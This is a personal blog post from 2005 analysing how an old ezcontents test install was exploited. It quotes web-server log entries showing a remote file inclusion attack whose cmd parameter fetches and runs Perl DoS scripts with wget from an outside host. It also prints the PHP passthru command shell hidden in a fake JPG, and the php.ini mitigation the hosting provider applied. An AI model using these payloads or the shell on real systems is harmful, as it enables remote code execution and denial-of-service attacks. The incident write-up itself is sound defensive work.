More details on php exploit from last week



Ok. I have a bit of time that I can sit down and get a little more detailed on what specifically happened late last week that shut the site down for a couple days.

At one point, I had updated the ezcontents script for the main site (averyjparker.com), but I had left (for about 2 years) a testbed install (at averyjparker.com/ncgen2) trying to setup a platform for an upgrade for the old Genealogy site (www.averyjparker.com/ncgen, new site is now at www.northcarolinagenealogy.net (linked at the top of the page.)) OK, so in searching through the logs here are some of the entries that caught my attention.

63.85.41.229 – - [14/Jul/2005:13:30:31 -0600] “POST /cgi-bin/cgiemail/forms/order.txt HTTP/1.1″ 403 319 “http://www.averyjparker.com/” “-”
200.174.133.132 – - [14/Jul/2005:13:11:59 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1″ 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:12:01 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1″ 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:12:01 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1″ 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:12:19 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=cd%20/tmp%20;%20wget%20%20http://www.caniggiamatador.com/xpl/pdr%20;
%20chmod%20777%20pdr;%20./pdr HTTP/1.1″ 200 1072 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:09:42 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?
&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl
%20dos.pl HTTP/1.1″ 200 1032 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)”
200.174.133.132 – - [14/Jul/2005:13:09:21 -0600] “GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg
?&cmd=wget HTTP/1.1″ 200 1120 “-” “Mozilla/4.0 (compatible; MSIE6.0; Windows NT 5.0)”

I guess I should preface this, by a simple fact. There are a LOT of exploit attempts that show up in webserver logs. Here’s a sample of one…
211.75.91.2 – - [14/Jul/2005:13:30:24 -0600] “POST /cgi-bin/mailform.pl HTTP/1.0″ 404 290 “http://www.averyjparker.com/” “-”

The first entry is the ip address, then the datestamp, then the specific query *(usually starting with Post or Get, and ending with the version of the protocol.) Next you see 404, that’s the result code and a 404 code means that this file wasn’t found.

What troubled me with the suspicious entries is that the result code was 200 (file found) and it was trying to pass various different bits of information to a php file (/ncgen2//include/db.php) which did exist.

In fact, this bit
?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget
%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl
made it look like they were trying to load this file from caniggiamatador.com. I looked at the source of lila.jpg (not a real image file by the way.) It’s basically an html file wrapped around this…
< ?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp”);
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(“>”, “>”, str_replace(“< ", "<", $output));
?>
ok, so they’re trying to inject this file http://www.caniggiamatador.com/dos.pl and http://www.caniggiamatador.com/perldos.pl

I looked at the code there and they were basically bash scripts that setup a denial of service attack on a specified target. Fairly clever and commented in Portuguese or Spanish. I’ve actually spent some time studying spanish, but there was a lot that was either mispelled, or I simply didn’t understand.

The site is down now by the way. It was hosted by http://www.internetters.net/ it looks like and my service provider dealt with contacting them I suspect.

Since I’m a fairly curious person…. I was also interested in the ip address that was originating the requests 200.174.133.132 An IP whois lookup turned up this…

200.174.133.132 = [ 200-174-133-132-tau.cpe.vivax.com.br ]

I’m guessing a dialup? customer in Brazil (which might back up that the comments were in Portuguese).

I, of course, sent what I found to my service provider. They thanked me for the time I’d spent researching the issue and verified that was the file they were exploiting and that it was a DOS attack against their nameservers. They also sent along a couple of notes on changes to the php.ini that they made to blunt the attack.

disabled_functions: system, cmd, shell_exec, passthru, popen

These were stated to hopefully prevent a future breach by the same method.

Some details of the exploit can be found here.
ezcontents code injection vulnerability

So, how did the find my site to attack. Who knows for certain, but I do have some ideas. I plan to detail those in an upcoming post.

Related Posts

Blog Traffic Exchange Related Posts
  • Another Massive ID theft ring It looks like Sunbelt has found ANOTHER massive Identity theft ring. They suspect it's a trojan from the Dumaru family that is contentedly logging the infromation and promise more details. They did get a hold of the trojan and passed it through virustotal to see what it was. Very FEW......
  • NEW exploit for the WMF vulnerability Just when you thought we had a good understanding of the recent zero-day WMF (Windows metafile exploit) it's worse. Sans is reporting on a new variation on the exploit released today. They have gone to yellow (again) to warn people. Here are some details. This exploit was "made by the......
  • The 2nd journey begins‚Ķ Mandriva 2006 upgrade 2 - Part 8 Ok - tv card - no name brand is now working... it was a bttv compatible card but it's always been "strange" for lack of a better word. NOTHING under linux has seemed to correctly detect it. Sometimes I have seen it given the following settings... bttv card=72 tuner=2, but......
Blog Traffic Exchange Related Websites
  • Keen Keen, Your Personal Advisor, is where you get live, immediate advice for your everyday life. Need advice? Information? Or simply someone friendly to talk to? Keen helps you find the right person and then connects you privately over the phone for a per-minute rate. // < ![CDATA[ google_ad_client =......
  • Diablo Creek Golf Course ¬†Diablo Creek Golf Course is located in: Concord, CA Phone: 925-686-6267 Website: http://www.diablocreekgc.com Course History: This Par 71 course was first opened in 1963. It was first designed by Bob Baldock and then later redesigned by Robert Muir Graves. There are numerous clubs in the area for residents, but visitors......
  • Hollywood Acai Diet document.write(''); Acai berry extract weight loss plan us your slim down secret. Burn more calories by tomorrow and build your best body ever. The easy and simple way to get a firmer, rounder more shapely butt. Indulge in your certain favorite foods at times and still lose weight. A......
www.pdf24.org    Send article as PDF   

Similar Posts


See what happened this day in history from either BBC Wikipedia
Search:
Keywords:
Amazon Logo

Comments are closed.


Switch to our mobile site